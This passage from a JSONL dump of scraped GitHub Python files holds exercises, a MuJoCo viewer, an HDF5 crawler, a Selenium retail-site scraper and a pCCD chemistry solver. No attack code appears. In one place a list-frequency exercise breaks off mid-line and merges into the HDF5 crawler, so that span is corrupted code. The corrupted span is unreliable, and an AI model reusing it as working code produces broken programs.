open(\"verb_complete_list.txt\",\"r\",encoding='utf-8') as verbs_list:\n f=verbs_list.read().split(\"\\n\")\n print(f)","repo_name":"Darleanow/FunnyUselessThings","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4296456139","text":"def constrainedMatchPair(firstMatch,secondMatch,length):\r\n\tm = length\r\n\tnearHits = ()\r\n\tfor n in range(0,len(firstMatch)):\r\n\t\tn = firstMatch[n]\r\n\t\tfor k in range(0,len(secondMatch)):\r\n\t\t\tk = secondMatch[k]\r\n\t\t\tif n + m + 1 == k:\r\n\t\t\t\tnearHits = nearHits + (n,)\r\n\treturn nearHits\r\n\r\n","repo_name":"dcaligiuri/MIT-OCW-6.00","sub_path":"assignment3c.py","file_name":"assignment3c.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72300497794","text":"import mujoco\nimport glfw\nimport sys\nimport numpy as np\nimport time\nfrom callbacks import CallBacks\n\n\nclass MujocoViewer:\n def __init__(self, model, data):\n self.model = model\n self.data = data\n\n self._time_per_render = 1 / 60.0\n self._loop_count = 0\n self._fastmode = False\n # Graphing\n self._num_pnts = 100\n\n # create options, camera, scene, context\n self.vopt = mujoco.MjvOption()\n self.cam = mujoco.MjvCamera()\n self.scn = mujoco.MjvScene(self.model, maxgeom=10000)\n self.pert = mujoco.MjvPerturb()\n self.fig = mujoco.MjvFigure()\n mujoco.mjv_defaultFigure(self.fig)\n\n for n in range(0, len(self.model.sensor_adr) * 3):\n for i in range(0, 300):\n self.fig.linedata[n][2 * i] = float(-i)\n\n # get callbacks\n self.callbacks = CallBacks(\n model=self.model,\n data=self.data,\n vopt=self.vopt,\n scn=self.scn,\n cam=self.cam,\n pert=self.pert,\n )\n\n # Adjust placement and size of graph\n width, height = self.callbacks.get_viewport_width_height()\n width_adjustment = width % 4\n self.pid_viewport = mujoco.MjrRect(\n int(3 * width / 4) + width_adjustment,\n 0,\n int(width / 4),\n int(height / 4),\n )\n mujoco.mjr_figure(self.pid_viewport, self.fig, self.callbacks.ctx)\n\n self.fig.flg_extend = 1\n self.fig.flg_symmetric = 0\n\n # overlay, markers\n self._overlay = {}\n self._markers = []\n self._data_graph_line_names = []\n self._line_datas = []\n self._sensor_data = \"degree\"\n\n def prepare(self):\n self.callbacks._joints = True\n self.vopt.flags[mujoco.mjtVisFlag.mjVIS_JOINT] = self.callbacks._joints\n self.callbacks._convex_hull_rendering = True\n self.vopt.flags[\n mujoco.mjtVisFlag.mjVIS_CONVEXHULL\n ] = self.callbacks._convex_hull_rendering\n self.callbacks._wire_frame = True\n self.scn.flags[\n mujoco.mjtRndFlag.mjRND_WIREFRAME\n ] = self.callbacks._wire_frame\n self.callbacks._shadows = False\n self.scn.flags[\n mujoco.mjtRndFlag.mjRND_SHADOW\n ] = self.callbacks._shadows\n\n def fastmode(self, fast: bool = True) -> bool:\n if fast is not True:\n self._fastmode = False\n else:\n self._fastmode = True\n return self._fastmode\n\n def get_arrow_state(self):\n return (\n self.callbacks._key_up,\n self.callbacks._key_down,\n self.callbacks._key_right,\n self.callbacks._key_left,\n )\n\n def clean_screen(self):\n self.callbacks._hide_menu = True\n self.callbacks._hide_graph = True\n\n def add_marker(self, **marker_params):\n self._markers.append(marker_params)\n\n def _add_marker_to_scene(self, marker):\n if self.scn.ngeom >= self.scn.maxgeom:\n raise RuntimeError(\n \"Ran out of geoms. 
maxgeom: %d\" % self.scn.maxgeom\n )\n\n g = self.scn.geoms[self.scn.ngeom]\n # default values.\n g.dataid = -1\n g.objtype = mujoco.mjtObj.mjOBJ_UNKNOWN\n g.objid = -1\n g.category = mujoco.mjtCatBit.mjCAT_DECOR\n g.texid = -1\n g.texuniform = 0\n g.texrepeat[0] = 1\n g.texrepeat[1] = 1\n g.emission = 0\n g.specular = 0.5\n g.shininess = 0.5\n g.reflectance = 0\n g.type = mujoco.mjtGeom.mjGEOM_BOX\n g.size[:] = np.ones(3) * 0.1\n g.mat[:] = np.eye(3)\n g.rgba[:] = np.ones(4)\n\n for key, value in marker.items():\n if isinstance(value, (int, float, mujoco._enums.mjtGeom)):\n setattr(g, key, value)\n elif isinstance(value, (tuple, list, np.ndarray)):\n attr = getattr(g, key)\n attr[:] = np.asarray(value).reshape(attr.shape)\n elif isinstance(value, str):\n assert key == \"label\", \"Only label is a string in mjtGeom.\"\n if value is None:\n g.label[0] = 0\n else:\n g.label = value\n elif hasattr(g, key):\n raise ValueError(\n \"mjtGeom has attr {} but type {} is invalid\".format(\n key, type(value)\n )\n )\n else:\n raise ValueError(\"mjtGeom doesn't have field %s\" % key)\n\n self.scn.ngeom += 1\n\n return\n\n def _create_overlay(self):\n topleft = mujoco.mjtGridPos.mjGRID_TOPLEFT\n topright = mujoco.mjtGridPos.mjGRID_TOPRIGHT\n bottomleft = mujoco.mjtGridPos.mjGRID_BOTTOMLEFT\n bottomright = mujoco.mjtGridPos.mjGRID_BOTTOMRIGHT\n\n def add_overlay(gridpos, text1, text2):\n if gridpos not in self._overlay:\n self._overlay[gridpos] = [\"\", \"\"]\n self._overlay[gridpos][0] += text1 + \"\\n\"\n self._overlay[gridpos][1] += text2 + \"\\n\"\n\n if self.callbacks._render_every_frame:\n add_overlay(topleft, \"\", \"\")\n else:\n add_overlay(\n topleft,\n \"Run speed = %.3f x real time\" % self.callbacks._run_speed,\n \"[S]lower, [F]aster\",\n )\n add_overlay(\n topleft,\n \"Ren[d]er every frame\",\n \"On\" if self.callbacks._render_every_frame else \"Off\",\n )\n add_overlay(\n topleft,\n \"Switch camera (#cams = %d)\" % (self.model.ncam + 1),\n \"[Tab] (camera ID = %d)\" % self.cam.fixedcamid,\n )\n add_overlay(\n topleft,\n \"[C]ontact forces\",\n \"On\" if self.callbacks._contacts else \"Off\",\n )\n add_overlay(\n topleft, \"[J]oints\", \"On\" if self.callbacks._joints else \"Off\"\n )\n add_overlay(\n topleft, \"[I]nertia\", \"On\" if self.callbacks._inertias else \"Off\"\n )\n add_overlay(\n topleft,\n \"Toggle [G]raph overlay\",\n \"On\" if self.callbacks._hide_graph else \"Off\",\n )\n add_overlay(\n topleft, \"Center of [M]ass\", \"On\" if self.callbacks._com else \"Off\"\n )\n add_overlay(\n topleft, \"Shad[O]ws\", \"On\" if self.callbacks._shadows else \"Off\"\n )\n add_overlay(\n topleft,\n \"T[r]ansparent\",\n \"On\" if self.callbacks._transparent else \"Off\",\n )\n add_overlay(\n topleft,\n \"[W]ireframe\",\n \"On\" if self.callbacks._wire_frame else \"Off\",\n )\n add_overlay(\n topleft,\n \"Con[V]ex Hull Rendering\",\n \"On\" if self.callbacks._convex_hull_rendering else \"Off\",\n )\n if self.callbacks._paused is not None:\n if not self.callbacks._paused:\n add_overlay(topleft, \"Stop\", \"[Space]\")\n else:\n add_overlay(topleft, \"Start\", \"[Space]\")\n add_overlay(\n topleft, \"Advance simulation by one step\", \"[right arrow]\"\n )\n add_overlay(\n topleft,\n \"Referenc[e] frames\",\n \"On\" if self.vopt.frame == 1 else \"Off\",\n )\n add_overlay(topleft, \"[H]ide Menu\", \"\")\n if self.callbacks._image_idx > 0:\n fname = self.callbacks._image_path % (\n self.callbacks._image_idx - 1\n )\n add_overlay(topleft, \"Cap[t]ure frame\", \"Saved as %s\" % fname)\n else:\n 
add_overlay(topleft, \"Cap[t]ure frame\", \"\")\n add_overlay(topleft, \"Toggle geomgroup visibility\", \"0-4\")\n\n add_overlay(\n bottomleft, \"FPS\", \"%d%s\" % (1 / self._time_per_render, \"\")\n )\n add_overlay(\n bottomleft, \"Solver iterations\", str(self.data.solver_iter + 1)\n )\n add_overlay(\n bottomleft,\n \"Step\",\n str(round(self.data.time / self.model.opt.timestep)),\n )\n add_overlay(bottomleft, \"timestep\", \"%.5f\" % self.model.opt.timestep)\n # CUSTOM\n add_overlay(\n topright,\n \"Arrow_up: Previous joint\",\n \"On\" if self.callbacks._key_up is True else \"Off\",\n )\n add_overlay(\n topright,\n \"Arrow_down: Previous joint\",\n \"On\" if self.callbacks._key_down is True else \"Off\",\n )\n add_overlay(\n topright,\n \"Arrow_left: Previous joint\",\n \"On\" if self.callbacks._key_left is True else \"Off\",\n )\n add_overlay(\n topright,\n \"Arrow_right: Previous joint\",\n \"On\" if self.callbacks._key_right is True else \"Off\",\n )\n\n def apply_perturbations(self):\n self.data.xfrc_applied = np.zeros_like(self.data.xfrc_applied)\n mujoco.mjv_applyPerturbPose(self.model, self.data, self.pert, 0)\n mujoco.mjv_applyPerturbForce(self.model, self.data, self.pert)\n\n def add_sensor(self, sensor):\n \"\"\"\n sensor: \"all\" or 0,1,2...\n \"\"\"\n if sensor == \"all\":\n self.adrs = self.model.sensor_adr\n else:\n self.adrs = []\n for i in range(len(sensor)):\n try:\n self.adrs.append(self.model.sensor_adr[sensor[i]])\n except Exception as e:\n raise ValueError(\"Sensor is not found in XML file\")\n # print(self.adrs)\n\n def axis_autorange(self):\n self.set_axis_range(x_range=[1.0, -1.0], y_range=[1.0, -1.0])\n\n def set_axis_range(self, x_range, y_range):\n \"\"\"\n x_range : list [x_min, x_max]\n y_range : list [y_min, y_max]\n \"\"\"\n assert (\n type(x_range) == list\n ), \"x_range is not a list with x_min and x_max\"\n assert (\n type(y_range) == list\n ), \"y_range is not a list with y_min and y_max\"\n if x_range[0] < x_range[1]:\n self.fig.range[0][0] = x_range[0] # x_min\n self.fig.range[0][1] = x_range[1] # x_max\n elif x_range[0] > x_range[1]:\n # limits set to auto range since {x_min > x_max}\n self.fig.range[0][0] = x_range[1]\n self.fig.range[0][1] = x_range[0]\n\n elif y_range[0] < y_range[1]:\n self.fig.range[1][0] = y_range[0] # y_min\n self.fig.range[1][1] = y_range[1] # y_max\n elif y_range[0] > y_range[1]:\n # limits set to auto range since {y_min > y_max}\n self.fig.range[1][0] = y_range[1]\n self.fig.range[1][1] = y_range[0]\n\n def set_grid_divisions(\n self, x_div: int, y_div: int, x_axis_time: float = 0.0\n ):\n self.fig.gridsize[0] = x_div + 1\n self.fig.gridsize[1] = y_div + 1\n if x_axis_time is not 0.0:\n self._num_pnts = x_axis_time / self.model.opt.timestep\n print(\"self._num_pnts: \", self._num_pnts)\n if self._num_pnts > 300:\n self._num_pnts = 300\n new_x_axis_time = self.model.opt.timestep * self._num_pnts\n print(\n f\"Minimum x_axis_time is: {new_x_axis_time}\"\n + \" reduce the x_axis_time\"\n f\" OR Maximum time_step is: \"\n + f\"{self.model.opt.timestep*self._num_pnts}\"\n + \" increase the timestep\"\n )\n # assert x_axis_time ==\n assert 1 <= self._num_pnts <= 300, (\n \"num_pnts should be [10,300], it is currently:\",\n f\"{self._num_pnts}\",\n )\n # self._num_pnts = num_pnts\n self._time_per_div = (self.model.opt.timestep * self._num_pnts) / (\n x_div\n )\n self.set_x_label(\n xname=f\"time/div: {self._time_per_div}s\"\n + f\" total: {self.model.opt.timestep * self._num_pnts}\"\n )\n\n def set_graph_name(self, name: str):\n 
assert type(name) == str, \"name is not a string\"\n self.fig.title = name\n\n def show_graph_legend(self, show_legend: bool = True):\n if show_legend is True:\n for i in range(0, len(self._data_graph_line_names)):\n self.fig.linename[i] = self._data_graph_line_names[i]\n self.fig.flg_legend = True\n\n def set_x_label(self, xname: str):\n assert type(xname) == str, \"xname is not a string\"\n self.fig.xlabel = xname\n\n def add_graph_line(self, line_name, line_data):\n assert (\n type(line_name) == str\n ), f\"Line_name is not a string: {type(line_name)}\"\n if line_name in self._data_graph_line_names:\n print(\"line name already exists\")\n else:\n self._data_graph_line_names.append(line_name)\n self._line_datas.append(line_data)\n\n def update_graph_line(self, line_name, line_data):\n if line_name in self._data_graph_line_names:\n idx = self._data_graph_line_names.index(line_name)\n self._line_datas[idx] = line_data\n else:\n raise NameError(\n \"line name is not valid, add it to list before calling update\"\n )\n\n def sensorupdate(self):\n # print(self._line_datas)\n pnt = int(mujoco.mju_min(self._num_pnts, self.fig.linepnt[0] + 1))\n # print(self.fig.linepnt[0] + 1)\n for n in range(0, len(self._line_datas)):\n for i in range(pnt - 1, 0, -1):\n self.fig.linedata[n][2 * i + 1] = self.fig.linedata[n][\n 2 * i - 1\n ]\n self.fig.linepnt[n] = pnt\n self.fig.linedata[n][1] = self._line_datas[n]\n\n def set_graph_units(self, type):\n if type == \"radian\":\n self._sensor_data == \"radian\"\n if type == \"degree\":\n self._sensor_data == \"degree\"\n\n def update_graph_size(self, size_div_x=None, size_div_y=None):\n if size_div_x is None and size_div_y is None:\n width, height = self.callbacks.get_viewport_width_height()\n width_adjustment = width % 3\n self.pid_viewport.left = int(2 * width / 3) + width_adjustment\n self.pid_viewport.width = int(width / 3)\n self.pid_viewport.height = int(height / 3)\n\n else:\n assert size_div_x is not None and size_div_y is None, \"\"\n width, height = self.callbacks.get_viewport_width_height()\n width_adjustment = width % size_div_x\n self.pid_viewport.left = (\n int((size_div_x - 1) * width / size_div_x) + width_adjustment\n )\n self.pid_viewport.width = int(width / size_div_x)\n self.pid_viewport.height = int(height / size_div_x)\n\n def render(self):\n # mjv_updateScene, mjr_render, mjr_overlay\n def update():\n # fill overlay items\n self._create_overlay()\n\n render_start = time.time()\n if self.callbacks.window is None:\n return\n elif glfw.window_should_close(self.callbacks.window):\n glfw.terminate()\n sys.exit(0)\n (\n self.callbacks.viewport.width,\n self.callbacks.viewport.height,\n ) = glfw.get_framebuffer_size(self.callbacks.window)\n with self.callbacks._gui_lock:\n # update scene\n mujoco.mjv_updateScene(\n self.model,\n self.data,\n self.vopt,\n self.pert,\n self.cam,\n mujoco.mjtCatBit.mjCAT_ALL.value,\n self.scn,\n )\n # marker items\n for marker in self._markers:\n self._add_marker_to_scene(marker)\n # render\n mujoco.mjr_render(\n self.callbacks.viewport, self.scn, self.callbacks.ctx\n )\n # overlay items\n if not self.callbacks._hide_menu:\n for gridpos, [t1, t2] in self._overlay.items():\n mujoco.mjr_overlay(\n mujoco.mjtFontScale.mjFONTSCALE_150,\n gridpos,\n self.callbacks.viewport,\n t1,\n t2,\n self.callbacks.ctx,\n )\n # Handle graph and pausing interactions\n if (\n not self.callbacks._hide_graph\n and not self.callbacks._paused\n ):\n self.sensorupdate()\n self.update_graph_size()\n mujoco.mjr_figure(\n self.pid_viewport, 
self.fig, self.callbacks.ctx\n )\n elif self.callbacks._hide_graph and self.callbacks._paused:\n self.update_graph_size()\n elif not self.callbacks._hide_graph and self.callbacks._paused:\n mujoco.mjr_figure(\n self.pid_viewport, self.fig, self.callbacks.ctx\n )\n elif self.callbacks._hide_graph and not self.callbacks._paused:\n self.sensorupdate()\n self.update_graph_size()\n\n self.callbacks._swap_buffers()\n self.callbacks._poll_events()\n self._time_per_render = 0.9 * self._time_per_render + 0.1 * (\n time.time() - render_start\n )\n\n # clear overlay\n self._overlay.clear()\n\n if self.callbacks._paused:\n while self.callbacks._paused:\n update()\n if self.callbacks._advance_by_one_step:\n self.callbacks._advance_by_one_step = False\n break\n else:\n self._loop_count += self.model.opt.timestep / (\n self._time_per_render * self.callbacks._run_speed\n )\n if self._fastmode is True:\n if not self.callbacks._render_every_frame:\n self._loop_count = 1\n while self._loop_count > 0:\n update()\n self._loop_count -= 1\n else:\n if self.callbacks._render_every_frame:\n self._loop_count = 1\n while self._loop_count > 0:\n update()\n self._loop_count -= 1\n\n # clear markers\n self._markers[:] = []\n\n # apply perturbation (should this come before mj_step?)\n self.apply_perturbations()\n\n def close(self):\n self.callbacks.close()\n","repo_name":"rohit-kumar-j/SPD_Controller_Mujoco","sub_path":"mujoco_viewer.py","file_name":"mujoco_viewer.py","file_ext":"py","file_size_in_byte":18902,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"24221606313","text":"#Question-1\ndef frequency(l):\n (minfreqlist,maxfreqlist,newlist)=([],[],[])\n (minfreq,maxfreq,freq)=(len(l),0,0)\n for i in l:\n if i not in newlist:\n newlist.append(i)\n newlist.sort()\n for i in newlist:\n freq=0\n for j in l:\n if j == i:\n freq=freq+1\n if freq==maxfreq:\n maxfreqlist.append(i)\n if freq>maxfreq:\n maxfreqlist=[]\n maxfreq=freq\n maxfreqlist.append(i)\n if freq==minfreq:\n minfreqlist.append(i)\n if freq= 2:\n return [full_key,child.shape]\n\n def search_wrapper(self, search_func, pars, obj=None,kyroot=None):\n\n if obj is None:\n obj = self.hfile\n self.result = []\n kyroot='/'\n\n for ky in obj.keys():\n cky = os.path.join(kyroot,ky)\n child = self.hfile[cky]\n\n r = search_func(pars,child,full_key=cky,key=ky)\n\n if r:\n self.result.append(r)\n\n if not isinstance(child,h5py.Dataset):\n self.search_wrapper(search_func,pars,obj=child,kyroot=cky)\n\n return self.result\n\n\ncr = h5crawler(sys.argv[1])\n\nresult = cr.search_2d()\n#result = cr.search_key('data')\nfor r in result:\n print(r)\n\n","repo_name":"txolutions/pyspec","sub_path":"python/file/h5datasets.py","file_name":"h5datasets.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"5521248172","text":"from textwrap import indent\r\nfrom selenium import webdriver\r\nfrom bs4 import BeautifulSoup\r\nfrom time import sleep\r\nimport json\r\nfrom selenium.webdriver.common.by import By\r\n\r\n#scrape the data\r\noptions = webdriver.ChromeOptions() \r\noptions.add_argument('--disable-blink-features=AutomationControlled')\r\ndriver = webdriver.Chrome(options=options)\r\ndriver.delete_all_cookies()\r\ndriver.get(\"https://www.hollisterco.com/shop/us\")\r\ndriver.find_element_by_xpath('//*[@id=\"site-cookie-banner\"]/div/div/button[1]').click()\r\ndriver.find_element_by_xpath('//*[@id=\"cat-label-12552\"]').click()\r\ndriver.find_element_by_xpath('//*[@id=\"cat-166318_l2\"]/a').click()\r\nsleep(2)\r\ndriver.find_element_by_xpath('//*[@id=\"p-48918396\"]/div/div[2]/div[1]/a').click()\r\nsleep(1)\r\ndriver.execute_script(\"window.scrollBy(0,500)\",\"\")\r\nsleep(1)\r\ndriver.find_element_by_css_selector('body > main > section.product-page-v2-modules.product.no-linkify.catalog-v2.js-product-page.product_429975 > section.product-page__main-container.scope-1892 > section.product-page__info-container > div > form > div.js-product-attributes-inline > div > div.product-size-selection-header_wrapper > div > button')\r\nsleep(5)\r\ndriver.close()\r\n#organize the data\r\n\r\n#dump the data","repo_name":"CS322-spring22/shopsi","sub_path":"backend/holscrap.py","file_name":"holscrap.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"22005024793","text":"import sys; sys.stdin = open(\"input/1316.txt\", \"r\")\n\nN = int(input())\narr = list(input() for _ in range(N))\n\ncount = 0\nfor i in range(N):\n over = []\n for j in range(len(arr[i])):\n flag = True\n if arr[i][j] in over:\n flag = False\n break\n if j < len(arr[i]) - 1:\n if arr[i][j] != arr[i][j+1]:\n over.append(arr[i][j])\n if flag == True:\n count += 1\n\nprint(count)","repo_name":"vreez/APS","sub_path":"boj/boj_1316_그룹 단어 체커.py","file_name":"boj_1316_그룹 단어 체커.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23490526181","text":"n = int(raw_input())\nabc = 0\nfor i in range(n):\n\tabc+=1\n\tr = int(raw_input())\n\tif(r==0):\n\t\tprint(\"Case #\"+str(abc)+\": \"\"INSOMNIA\")\n\telse:\n\t\td = [0 for i in range(10)]\n\t\tvisited = 0\n\t\tk = 0\n\t\tcount = 1\n\t\twhile(k==0):\n\t\t\ttemp = r*count\n\t\t\twhile(temp!=0):\n\t\t\t\tif(d[temp%10]==0):\n\t\t\t\t\td[temp%10]=1\n\t\t\t\t\tvisited+=1\n\t\t\t\t\tif(visited==10):\n\t\t\t\t\t\tk=1\n\t\t\t\t\t\tbreak\n\t\t\t\ttemp/=10\n\t\t\tcount+=1\n\t\tprint(\"Case #\"+str(abc)+\": \"+str(r*(count-1)))\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_177/915.py","file_name":"915.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"37510991795","text":"\"\"\"\nC-like implementaiton of of pCCD equations.\n\nTODO: vectorize further with numpy. current form is to compare with other codes\n\"\"\"\nfrom itertools import product\nimport numpy as np\nimport openfermion as of\n\n\ndef get_h2o():\n # from openfermionpsi4 import run_psi4\n from openfermionpyscf import run_pyscf\n geometry = [['O', [0.000000000000, 0.000000000000, -0.068516219320]],\n ['H', [0.000000000000, -0.790689573744, 0.543701060715]],\n ['H', [0.000000000000, 0.790689573744, 0.543701060715]]]\n multiplicity = 1\n charge = 0\n basis = '6-31g'\n molecule = of.MolecularData(geometry=geometry, multiplicity=multiplicity,\n charge=charge, basis=basis)\n molecule = run_pyscf(molecule)\n print(molecule.hf_energy)\n return molecule\n\n\nclass pCCD:\n\n def __init__(self, molecule=None, iter_max=100, e_convergence=1.0E-6,\n r_convergence=1.0E-6, oei=None, tei=None, n_electrons=None,\n enuc=0):\n self.molecule = molecule\n self.t0 = None\n self.sigma = None\n self.iter_max = iter_max\n self.e_convergence = e_convergence\n self.r_convergence = r_convergence\n\n if molecule is None and (oei is not None and tei is not None and n_electrons is not None):\n self.oei = oei\n self.tei = tei\n self.o = n_electrons // 2\n norbs = oei.shape[0]\n self.v = norbs - self.o\n self.enuc = enuc\n else:\n self.o = molecule.n_electrons // 2\n self.v = molecule.n_orbitals - self.o\n oei, tei = molecule.get_integrals()\n self.oei = oei\n self.tei = tei\n self.enuc = molecule.nuclear_repulsion\n\n def setup_integrals(self):\n oei, tei = self.oei, self.tei\n o, v = self.o, self.v\n\n self.v_iiaa = np.zeros(o * v)\n self.v_iaia = np.zeros(o * v)\n self.v_ijij = np.zeros(o * o)\n self.v_abab = np.zeros(v * v)\n self.f_o = np.zeros(o)\n self.f_v = np.zeros(v)\n\n # print(\"v_(ii|aa)\")\n for i in range(o):\n for a in range(v):\n self.v_iiaa[i * v + a] = tei[i, a + o, a + o, i]\n\n # print(\"v_(ia|ia)\")\n for i in range(o):\n for a in range(v):\n self.v_iaia[i * v + a] = tei[i, i, a + o, a + o]\n\n # print(\"v_(ij|ij)\")\n for i in range(o):\n for j in range(o):\n self.v_ijij[i * o + j] = tei[i, i, j, j]\n\n # print(\"v_(ab|ab)\")\n for a in range(v):\n for b in range(v):\n self.v_abab[a * v + b] = tei[a + o, a + o, b + o, b + o]\n\n # print(\"fock (o)\")\n for i in range(o):\n dum = oei[i, i]\n for k in range(o):\n dum += 2 * tei[i, k, k, i]\n dum -= tei[i, k, i, k]\n self.f_o[i] = dum\n\n # print(\"fock (v)\")\n for a in range(v):\n dum = oei[a + o, a + o]\n for k in range(o):\n dum += 2 * tei[a + o, k, k, a + o]\n dum -= tei[a + o, k, a + o, k]\n self.f_v[a] = dum\n\n self.escf = self.enuc # molecule.nuclear_repulsion\n for i in range(o):\n self.escf += oei[i, i] + self.f_o[i]\n\n def compute_energy(self):\n o, v = self.o, self.v\n en = 0\n\n # initialize amplitudes to zero\n self.t2 = np.zeros(o * v)\n self.setup_integrals()\n iter = 0\n\n while iter < self.iter_max:\n\n self.evaluate_residual()\n\n # update amplitudes\n for i in range(o):\n for a in range(v):\n self.residual[i * v + a] *= -0.5 / (self.f_v[a] - self.f_o[i])\n\n self.t0 = self.residual.copy()\n self.t0 = self.t0 + -self.t2\n\n nrm = np.linalg.norm(self.t0)\n self.t2 = self.residual.copy()\n\n dE = en\n en = self.evaluate_projected_energy()\n dE -= en\n print(\"\\t\\t\\t{}\\t{: 5.10f}\\t{: 5.10f}\\t{: 5.10f}\".format(iter, en, dE, nrm))\n\n if np.abs(dE) < self.e_convergence and nrm < self.r_convergence:\n break\n\n iter += 1\n\n self.correlation_energy = en\n self.total_energy = self.escf + en\n 
print(\"\\t\\tIterations Converged\")\n print(\"\\t\\tCorrelation Energy {: 5.20f}\".format(self.total_energy - self.escf))\n print(\"\\t\\tTotal Energy {: 5.20f}\".format(self.total_energy))\n\n\n def evaluate_projected_energy(self):\n o, v = self.o, self.v\n energy = 0.\n # reset t0 to ones\n for i in range(o):\n for a in range(v):\n energy += self.t2[i * v + a] * self.v_iaia[i * v + a]\n return energy\n\n def normalize(self):\n self.t0 = np.ones(self.o * self.v)\n\n def evaluate_residual(self):\n o, v = self.o, self.v\n self.normalize()\n self.residual = np.zeros(o * v)\n self.residual = self.evaluate_sigma()\n\n VxT_v = np.zeros(v)\n VxT_o = np.zeros(o)\n VxT_oo = np.zeros(o * o)\n\n # print(\"VxT_v \")\n for a in range(v):\n # contract over the occupied space to get the virtual index\n VxT_v[a] = -2.0 * np.dot(self.v_iaia[a::v], self.t2[a::v])\n\n # print(\"VxT_o \")\n for i in range(o):\n # contract over the virtual index of the vectorized matrix\n VxT_o[i] = -2.0 * np.dot(self.v_iaia[i * v:(i + 1) * v], self.t2[i * v: (i + 1)* v ])\n\n # print(\"VxT_oo(i,j) = (jb|jb) t(i,b)\")\n for i, j in product(range(o), repeat=2):\n VxT_oo[i * o + j] = np.dot(self.v_iaia[j*v:(j + 1)*v], self.t2[i*v:(i + 1)*v])\n\n # // r2(i,a) += t(j,a) VxT_oo(i,j)\n for i in range(o):\n for a in range(v):\n # sum over j index\n self.residual[i * v + a] += np.dot(self.t2[a::v], VxT_oo[i * o:(i + 1) * o])\n\n # print(\"VxT_v and o contraction\")\n for i in range(o):\n for a in range(v):\n dum = 0.\n dum += VxT_v[a] * self.t2[i * v + a]\n dum += VxT_o[i] * self.t2[i * v + a]\n\n t_t2 = self.t2[i * v + a]\n dum += 2.0 * self.v_iaia[i * v + a] * t_t2 * t_t2\n self.residual[i * v + a] += dum\n\n def evaluate_sigma(self):\n \"\"\"\n Evaluate\n \"\"\"\n o, v = self.o, self.v\n sigma = self.v_iaia.copy()\n for i in range(o):\n for a in range(v):\n sigma[i * v + a] -= 2 * (2 * self.v_iiaa[i * v + a] - self.v_iaia[i * v + a]) * self.t2[i * v + a]\n\n for i in range(o):\n for a in range(v):\n dum = 0\n for b in range(v):\n dum += self.v_abab[a * v + b] * self.t2[i * v + b]\n for j in range(o):\n dum += self.v_ijij[i * o + j] * self.t2[j * v + a]\n sigma[i * v + a] += dum\n return sigma\n\n\nif __name__ == \"__main__\":\n molecule = get_h2o()\n pccd = pCCD(molecule, iter_max=20)\n pccd.setup_integrals()\n pccd.compute_energy()\n\n print(\"pCCD T2 amps\")\n for i in range(pccd.o):\n for a in range(pccd.v):\n print(\"{}\\t{}\\t{: 5.20f}\".format(i, a, pccd.t2[i * pccd.v + a]))\n\n from lambda_ccd_with_pccd_restriction import LambdaCCD\n from openfermion.chem.molecular_data import spinorb_from_spatial\n from lambda_ccd import kernel, ccsd_energy\n # pccd_lccd = LambdaCCD(molecule, restrict_to_pair_doubles=False)\n # oei, tei = molecule.oei, pccd.tei\n oei, tei = molecule.get_integrals()\n soei, stei = spinorb_from_spatial(oei, tei)\n astei = np.einsum('ijkl', stei) - np.einsum('ijlk', stei)\n gtei = astei.transpose(0, 1, 3, 2)\n\n mf = molecule._pyscf_data['scf']\n occ = mf.mo_occ\n nele = int(sum(occ))\n nocc = nele // 2\n norbs = oei.shape[0]\n nsvirt = 2 * (norbs - nocc)\n nsocc = 2 * nocc\n\n eps = np.kron(molecule.orbital_energies, np.ones(2))\n n = np.newaxis\n o = slice(None, nsocc)\n v = slice(nsocc, None)\n\n\n\n e_abij = 1 / (-eps[v, n, n, n] - eps[n, v, n, n] + eps[n, n, o, n] + eps[\n n, n, n, o])\n e_ai = 1 / (-eps[v, n] + eps[n, o])\n\n fock = soei + np.einsum('piiq->pq', astei[:, o, o, :])\n hf_energy = 0.5 * np.einsum('ii', (fock + soei)[o, o])\n hf_energy_test = 1.0 * np.einsum('ii', fock[o, o]) -0.5 * 
np.einsum('ijij', gtei[o, o, o, o])\n print(\"HF energies\")\n print(hf_energy, mf.e_tot - mf.energy_nuc())\n\n\n # pccd_lccd.solve_cc_equations(soei, astei)\n t1z, t2z = np.zeros((nsvirt, nsocc)), np.zeros((nsvirt, nsvirt, nsocc, nsocc))\n t1f, t2f, l1f, l2f = kernel(t1z, t2z, fock, gtei, o, v, e_ai, e_abij,\n stopping_eps=1.0E-12)\n\n print(\"Final Correlation Energy\")\n print(ccsd_energy(t1f, t2f, fock, gtei, o, v) - hf_energy)\n\n print(\"E(CCSD)-NCR = {}\".format(ccsd_energy(t1f, t2f, fock, gtei, o, v) + mf.energy_nuc()))\n\n mycc = mf.CCSD()\n mycc.conv_tol = 1.0E-12\n ecc, pyscf_t1, pyscf_t2 = mycc.kernel()\n print('CCSD correlation energy', mycc.e_corr)\n\n\n\n lccd = LambdaCCD(molecule=molecule, e_convergence=mycc.conv_tol)\n lccd.solve_cc_equations(soei, astei)\n\n\n from pyscf import cc\n mycc = cc.CCSD(mf)\n old_update_amps = mycc.update_amps\n def update_amps(t1, t2, eris):\n t1, t2 = old_update_amps(t1, t2, eris)\n return t1 * 0, t2\n mycc.update_amps = update_amps\n mycc.kernel()\n\n lccd = LambdaCCD(molecule=molecule, e_convergence=mycc.conv_tol, restrict_to_pair_doubles=True,\n iter_max=500)\n lccd.solve_cc_equations(soei, astei)\n\n pccd = pCCD(molecule, iter_max=20)\n pccd.setup_integrals()\n 